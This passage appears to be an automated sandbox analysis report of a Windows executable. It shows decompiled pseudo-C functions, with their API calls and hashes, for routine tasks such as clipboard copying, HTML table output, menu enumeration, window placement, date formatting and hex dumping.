0x00405520
0x0040552c
0x00405535
0x0040553e
0x00405548
0x0040554a
0x0040554a
0x0040554d
0x0040554e
0x00405558

APIs

EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
wcslen.MSVCRT ref: 00405506
GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
GlobalLock.KERNEL32 ref: 00405523
memcpy.MSVCRT ref: 0040552C
GlobalUnlock.KERNEL32(00000000), ref: 00405535
SetClipboardData.USER32 ref: 0040553E
CloseClipboard.USER32 ref: 0040554E

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
String ID:
API String ID: 1213725291-0
Opcode ID: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
Instruction ID: cbe089e464cab8641743a2df57c61d738c9647510a312ad91d4355c2b2932f4a
Opcode Fuzzy Hash: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
Instruction Fuzzy Hash: 94F0BB371003287BD23037B1ED4CD6B776CDB85B49B05013DF505F6652DA355C084AB9

Uniqueness

Uniqueness Score: -1.00%

Function 004078E1, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004078E1(intOrPtr* __eax, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t77;
				signed short _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				signed short _t96;
				void* _t98;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				intOrPtr* _t133;
				signed int _t137;
				signed int _t139;
				void* _t142;
				void* _t143;
				void* _t147;

				_t143 = __eflags;
				_push(__ecx);
				_push(__ecx);
				_t133 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x6c))();
				E0040768E(__eax);
				 *(_t133 + 0x40) =  *(_t133 + 0x40) & 0x00000000;
				_t137 = 0xb;
				 *((intOrPtr*)(_t133 + 0x2ac)) = _a4;
				_t126 = 0x14;
				_t75 = _t137 * _t126;
				 *(_t133 + 0x2e0) = _t137;
				_push( ~(0 | _t143 > 0x00000000) | _t75);
				L0040E038();
				 *(_t133 + 0x2e4) = _t75;
				_t128 = 0x14;
				_t77 = _t137 * _t128;
				_push( ~(0 | _t143 > 0x00000000) | _t77);
				L0040E038();
				_t98 = 0x4120c0;
				 *(_t133 + 0x48) = _t77;
				_v8 = 0x4120c0;
				do {
					_t139 =  *_t98 * 0x14;
					memcpy( *(_t133 + 0x2e4) + _t139, _t98, 0x14);
					_t24 = _t98 + 0x14; // 0x4120d4
					memcpy( *(_t133 + 0x48) + _t139, _t24, 0x14);
					_t86 =  *( *(_t133 + 0x2e4) + _t139 + 0x10);
					_t142 = _t142 + 0x18;
					_v12 = _t86;
					 *( *(_t133 + 0x48) + _t139 + 0x10) = _t86;
					if((_t86 & 0xffff0000) == 0) {
						 *( *(_t133 + 0x2e4) + _t139 + 0x10) = E00406827(_t86 & 0x0000ffff);
						_t96 = E00406827(_v12 | 0x00010000);
						_t98 = _v8;
						 *( *(_t133 + 0x48) + _t139 + 0x10) = _t96;
					}
					_t98 = _t98 + 0x28;
					_t147 = _t98 - 0x412278;
					_v8 = _t98;
				} while (_t147 < 0);
				 *(_t133 + 0x4c) =  *(_t133 + 0x4c) & 0x00000000;
				 *((intOrPtr*)(_t133 + 0x50)) = _a8;
				_t88 = 0xb;
				_t130 = 4;
				 *(_t133 + 0x34) = _t88;
				_t89 = _t88 * _t130;
				 *((intOrPtr*)(_t133 + 0x30)) = 0x20;
				_push( ~(0 | _t147 > 0x00000000) | _t89);
				L0040E038();
				_push(0xc);
				 *(_t133 + 0x38) = _t89;
				L0040E038();
				_t140 = _t89;
				if(_t89 == 0) {
					_t90 = 0;
					__eflags = 0;
				} else {
					_t90 = E00407440(_a4,  *((intOrPtr*)(_t133 + 0x60)), _t140);
				}
				 *((intOrPtr*)(_t133 + 0x2cc)) = _t90;
				 *((intOrPtr*)(_t133 + 0x54)) = 1;
				 *((intOrPtr*)(_t133 + 0x58)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2c4)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c8)) = 0;
				 *((intOrPtr*)(_t133 + 0x2d0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2d4)) = 1;
				 *((intOrPtr*)(_t133 + 0x344)) = 0x32;
				 *((intOrPtr*)(_t133 + 0x64)) = 0xffffff;
				return E00407861(_t133);
			}

0x004078e1
0x004078e4
0x004078e5
0x004078e9
0x004078f4
0x004078f7
0x004078ff
0x00407905
0x00407906
0x00407910
0x00407913
0x00407918
0x00407922
0x00407923
0x00407928
0x00407932
0x00407935
0x0040793e
0x0040793f
0x00407945
0x0040794b
0x0040794e
0x00407951
0x00407959
0x00407962
0x00407969
0x00407973
0x0040797e
0x00407985
0x0040798d
0x00407990
0x00407994
0x004079ad
0x004079b1
0x004079b9
0x004079bc
0x004079bc
0x004079c0
0x004079c3
0x004079c9
0x004079c9
0x004079d1
0x004079d7
0x004079da
0x004079df
0x004079e0
0x004079e3
0x004079e8
0x004079f3
0x004079f4
0x004079f9
0x004079fb
0x004079fe
0x00407a03
0x00407a09
0x00407a18
0x00407a18
0x00407a0b
0x00407a11
0x00407a11
0x00407a1a
0x00407a25
0x00407a28
0x00407a2b
0x00407a31
0x00407a37
0x00407a3d
0x00407a43
0x00407a49
0x00407a53
0x00407a63

APIs

Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9

??2@YAPAXI@Z.MSVCRT ref: 00407923
??2@YAPAXI@Z.MSVCRT ref: 0040793F
memcpy.MSVCRT ref: 00407962
memcpy.MSVCRT ref: 00407973
??2@YAPAXI@Z.MSVCRT ref: 004079F4
??2@YAPAXI@Z.MSVCRT ref: 004079FE

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

Strings

x"A, xrefs: 004079C3

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID: x"A
API String ID: 975042529-63625180
Opcode ID: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
Instruction ID: 8801afb4ace5fbedb5bd820c2c75847393e8be4378505899df7aece04ba2f2e1
Opcode Fuzzy Hash: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
Instruction Fuzzy Hash: 79418DB2A01712AFD718DF3AD485B99BBA4BF04314F10422FE609DB2C1D775B8208B98

Uniqueness

Uniqueness Score: -1.00%

Function 004031BE, Relevance: 10.6, APIs: 7, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E004031BE(intOrPtr _a4) {
				struct HWND__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				short _v28;
				intOrPtr _v56;
				char* _v60;
				void* _v72;
				void _v582;
				char _v584;
				struct HWND__* _t52;
				intOrPtr* _t58;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t79;
				void* _t82;
				intOrPtr _t87;
				signed int _t89;
				short* _t90;
				void* _t92;
				void* _t93;

				_t87 = _a4;
				_t52 = GetDlgItem( *(_t87 + 0x10), 0x3e9);
				_v8 = _t52;
				SendMessageW(_t52, 0x1009, 0, 0);
				SendMessageW(_v8, 0x1036, 0, 0x26);
				do {
				} while (SendMessageW(_v8, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v8);
				_t78 = 6;
				E00402842(0x40f454, _t78);
				_t58 =  *((intOrPtr*)(_t87 + 0x40));
				_t79 =  *((intOrPtr*)(_t58 + 4));
				_t77 =  *_t58;
				_t93 = _t92 + 0x10;
				_v24 = _t79;
				_v16 = 0;
				if(_t79 <= 0) {
					L10:
					_t59 = 2;
					E004027D3(_t59, _v8, 0, _t59);
					return SetFocus(_v8);
				} else {
					goto L3;
				}
				do {
					L3:
					_v12 = 0;
					_v20 = 0;
					do {
						_t89 = _v12 << 2;
						if( *((short*)(_t77 + _t89 + 2)) == _v16) {
							_v584 = 0;
							memset( &_v582, 0, 0x1fe);
							_t93 = _t93 + 0xc;
							_v60 =  &_v584;
							_v72 = 4;
							_v56 = 0xff;
							if(SendMessageW( *( *((intOrPtr*)(_a4 + 0x40)) + 8), 0x105f, _v12,  &_v72) != 0) {
								_push(0);
								_push(_v12);
								_push(0);
								_push(0);
								_push(0);
								_push(_v8);
								_t82 = 5;
								_t71 = E004028C5( &_v584, _t82);
								_t90 = _t89 + _t77;
								_t83 =  *_t90;
								_v28 =  *_t90;
								E00402CD0(_v8, _t71, 0 | _t83 > 0x00000000);
								_t93 = _t93 + 0x24;
								if(_v28 == 0) {
									 *_t90 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x44)) + _v20 + 0xc));
								}
							}
						}
						_v12 = _v12 + 1;
						_t63 = _v24;
						_v20 = _v20 + 0x14;
					} while (_v12 < _t63);
					_v16 = _v16 + 1;
				} while (_v16 < _t63);
				goto L10;
			}

0x004031ca
0x004031d5
0x004031eb
0x004031ee
0x004031fb
0x004031fd
0x00403209
0x0040320d
0x00403212
0x00403213
0x00403214
0x0040321e
0x0040321f
0x00403224
0x00403227
0x0040322a
0x0040322c
0x00403231
0x00403234
0x00403237
0x00403313
0x00403315
0x0040331b
0x00403330
0x00000000
0x00000000
0x00000000
0x0040323d
0x0040323d
0x0040323d
0x00403240
0x00403243
0x00403246
0x00403251
0x00403264
0x0040326b
0x00403279
0x00403282
0x0040328c
0x00403299
0x004032a8
0x004032aa
0x004032ab
0x004032b4
0x004032b5
0x004032b6
0x004032b7
0x004032bc
0x004032bd
0x004032c2
0x004032c4
0x004032ce
0x004032d6
0x004032db
0x004032e1
0x004032f1
0x004032f1
0x004032e1
0x004032a8
0x004032f4
0x004032f7
0x004032fa
0x004032fe
0x00403307
0x0040330a
0x00000000

APIs

GetDlgItem.USER32 ref: 004031D5
SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 004031EE
SendMessageW.USER32(?,00001036,00000000,00000026), ref: 004031FB
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00403207
memset.MSVCRT ref: 0040326B
SendMessageW.USER32(?,0000105F,?,?), ref: 004032A0
SetFocus.USER32(?), ref: 00403326

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
Instruction ID: e5884d61c50a84840a295c8cd46100b63ab271327737e15352f16c4cecb35b78
Opcode Fuzzy Hash: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
Instruction Fuzzy Hash: 46418A35900219BFDB20EF85CD89EAFBF78EF04354F1040AAF908B6291D3719A40DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408AFA, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00408AFA(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t94;
				intOrPtr* _t97;
				void* _t99;
				void* _t101;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t101 = _t99 + 0x18;
				asm("movsw");
				E00408857(__ebx, 0, _a4, L"<tr>");
				_t94 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x38)) + _t94 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x48)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t97 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t94, _t97,  &_v28);
						E0040DBA9(_v28,  &_v108);
						E0040DBDA( *((intOrPtr*)( *_t97))(_v8,  *((intOrPtr*)(_t73 + 0x68))),  *(_t73 + 0x6c));
						 *((intOrPtr*)( *_t73 + 0x54))( *(_t73 + 0x6c), _t97, _v8);
						_t67 =  *(_t73 + 0x6c);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
							_pop(0);
						}
						E0040DC79( &_v28,  *((intOrPtr*)(_t73 + 0x70)),  *(_t73 + 0x6c));
						_push( *((intOrPtr*)(_t73 + 0x70)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x68)));
						L0040DFD6();
						_t101 = _t101 + 0x1c;
						E00408857(_t73, 0, _a4,  *((intOrPtr*)(_t73 + 0x68)));
						_t94 = _t94 + 1;
					} while (_t94 <  *((intOrPtr*)(_t73 + 0x34)));
				}
				return E00408857(_t73, 0, _a4, L"\r\n");
			}

0x00408afa
0x00408b07
0x00408b08
0x00408b15
0x00408b20
0x00408b20
0x00408b2c
0x00408b2e
0x00408b33
0x00408b38
0x00408b3e
0x00408b41
0x00408b47
0x00408b52
0x00408b58
0x00408b5a
0x00408b5a
0x00408b5d
0x00408b60
0x00408b64
0x00408b68
0x00408b6c
0x00408b76
0x00408b7f
0x00408b89
0x00408b9f
0x00408baf
0x00408bb2
0x00408bb5
0x00408bbb
0x00408bc9
0x00408bcf
0x00408bcf
0x00408bd9
0x00408bde
0x00408be4
0x00408be5
0x00408be8
0x00408bed
0x00408bf0
0x00408bf5
0x00408c00
0x00408c05
0x00408c06
0x00408b3e
0x00408c21

APIs

wcscat.MSVCRT ref: 00408BC9
_snwprintf.MSVCRT ref: 00408BF0

Strings

 , xrefs: 00408BC3
<td bgcolor=#%s nowrap>%s, xrefs: 00408B0A
<td bgcolor=#%s>%s, xrefs: 00408B18
<tr>, xrefs: 00408B22

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
Instruction ID: 96aa4744b540e0de5a537674df1821739e57c2366694ca0e95279aca4d83ea93
Opcode Fuzzy Hash: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
Instruction Fuzzy Hash: 10318D31900208AFDF10AF55CC85E9A7B75FF04320F1040BAF855AB2E2DB35A945DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00406E97, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00406E97(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040E340(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E00406E97(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x412c34 =  *0x412c34 + 1;
							_t32 =  *0x412c34; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406E5E(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

0x00406e97
0x00406e9a
0x00406ea2
0x00406ead
0x00406eb3
0x00406eb7
0x00406ebb
0x00406f81
0x00406f87
0x00000000
0x00000000
0x00000000
0x00406ec1
0x00406ec1
0x00406ecc
0x00406ed1
0x00406ed8
0x00406ee7
0x00406eef
0x00406ef7
0x00406eff
0x00406f03
0x00406f08
0x00406f10
0x00000000
0x00000000
0x00406f17
0x00406f62
0x00406f62
0x00406f66
0x00406f68
0x00406f69
0x00406f6d
0x00406f70
0x00406f75
0x00406f75
0x00000000
0x00406f66
0x00406f20
0x00406f29
0x00406f2b
0x00406f2b
0x00406f32
0x00406f36
0x00406f3b
0x00406f45
0x00406f4b
0x00406f50
0x00406f50
0x00406f3d
0x00406f3d
0x00406f3d
0x00406f3d
0x00406f3b
0x00406f5b
0x00406f61
0x00000000
0x00406f78
0x00406f78
0x00406f79
0x00000000

APIs

GetMenuItemCount.USER32 ref: 00406EAD
memset.MSVCRT ref: 00406ECC
GetMenuItemInfoW.USER32 ref: 00406F08
wcschr.MSVCRT ref: 00406F20

Strings

6, xrefs: 00406EEF
0, xrefs: 00406EE7

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
Instruction ID: 1dbbb6522b92818e37563bbb7cb847876382a1d5db42aae0addc6953e8b82e52
Opcode Fuzzy Hash: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
Instruction Fuzzy Hash: 9021BF31105345ABC7209F61E84599FB7B8FB84754F000A3FF645A2280E7769A24CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004019D2, Relevance: 10.6, APIs: 7, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004019D2(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t26;
				int _t30;
				void* _t33;
				int _t36;
				int _t37;
				int _t40;
				int _t49;

				_t33 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x208)) == 0) {
					return _t26;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t40 = GetSystemMetrics(0x4c);
					_t30 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t40 = 0;
						_t30 = 0;
					} else {
						_v8 = _v8 + _t40;
						_v12 = _v12 + _t30;
					}
					_t49 = _v20 - _v28;
					if(_t49 > 0x14) {
						_t37 = _v24;
						_t36 = _v16 - _t37;
						if(_t36 > 0x14 && _v20 > _t40 + 5) {
							_t30 = _t30 + 0xfffffff6;
							if(_t37 >= _t30) {
								_t30 = _v28;
								if(_t30 + 0x14 < _v8 && _t37 + 0x14 < _v12 &&  *((intOrPtr*)(_t33 + 0x250)) != 0) {
									_t30 = SetWindowPos( *(_t33 + 0x208), 0, _t30, _t37, _t49, _t36, 0x204);
								}
							}
						}
					}
					return _t30;
				}
			}

0x004019d2
0x004019df
0x00401a94
0x004019e5
0x004019f0
0x004019f1
0x004019f2
0x004019f3
0x00401a00
0x00401a07
0x00401a0e
0x00401a10
0x00401a17
0x00401a2b
0x00401a30
0x00401a33
0x00401a35
0x00401a1e
0x00401a1e
0x00401a21
0x00401a21
0x00401a3a
0x00401a40
0x00401a45
0x00401a48
0x00401a4d
0x00401a57
0x00401a5c
0x00401a5e
0x00401a67
0x00401a8b
0x00401a8b
0x00401a67
0x00401a5c
0x00401a4d
0x00000000
0x00401a92

APIs

GetSystemMetrics.USER32 ref: 004019FC
GetSystemMetrics.USER32 ref: 00401A03
GetSystemMetrics.USER32 ref: 00401A0A
GetSystemMetrics.USER32 ref: 00401A10
GetSystemMetrics.USER32 ref: 00401A27
GetSystemMetrics.USER32 ref: 00401A2E
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000204,?,?,?,?,?,004019CF), ref: 00401A8B

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
Instruction ID: e852b1759cb622fbc777dcf2117f8c3e284781620e86bac7d74114db1399c759
Opcode Fuzzy Hash: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
Instruction Fuzzy Hash: 27215C72E4221AEBDF10DFA88D496AF7B71EF40320F1141BAD904BB2D1D674A981CE94

Uniqueness

Uniqueness Score: -1.00%

Function 00405C17, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C17(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v24;
				long _v280;
				long _v536;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v24) == 0 || _v24 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v24, 0,  &_v280, 0x80);
						GetTimeFormatW(0x400, 0,  &_v24, 0,  &_v536, 0x80);
						wcscpy(_a4,  &_v280);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v536);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40f454);
				}
				return _a4;
			}

0x00405c17
0x00405c28
0x00405c3b
0x00000000
0x00405c45
0x00405c5f
0x00405c74
0x00405c84
0x00405c91
0x00405ca0
0x00405ca5
0x00405caa
0x00405caa
0x00405cb2
0x00405cb8
0x00405cc0

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00405C33
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080), ref: 00405C5F
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080), ref: 00405C74
wcscpy.MSVCRT ref: 00405C84
wcscat.MSVCRT ref: 00405C91
wcscat.MSVCRT ref: 00405CA0
wcscpy.MSVCRT ref: 00405CB2

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
Instruction ID: cbd8c252d2d2ef195a4c0e5b8e64ca40110f1bd057fda192b525793d095b5ed7
Opcode Fuzzy Hash: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
Instruction Fuzzy Hash: 57116072900209AFEB20AB90DD45EEF776CEB04314F104076FA05B6091E675AE49CAB9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D33, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00405D33(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040DFD6();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

0x00405d33
0x00405d3c
0x00405d53
0x00405d58
0x00405d5c
0x00405d5f
0x00405d61
0x00405d68
0x00405d69
0x00405d74
0x00405d79
0x00405d7a
0x00405d7f
0x00405d84
0x00405d8c
0x00405d92
0x00405d97
0x00405d9b
0x00405da1
0x00405da9
0x00405daf
0x00405da1
0x00405db8
0x00405dbd
0x00405dc5
0x00405dcc

APIs

memset.MSVCRT ref: 00405D53
_snwprintf.MSVCRT ref: 00405D7A
wcscat.MSVCRT ref: 00405D8C
wcscat.MSVCRT ref: 00405DA9
wcscat.MSVCRT ref: 00405DB8

Strings

%2.2X, xrefs: 00405D69

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
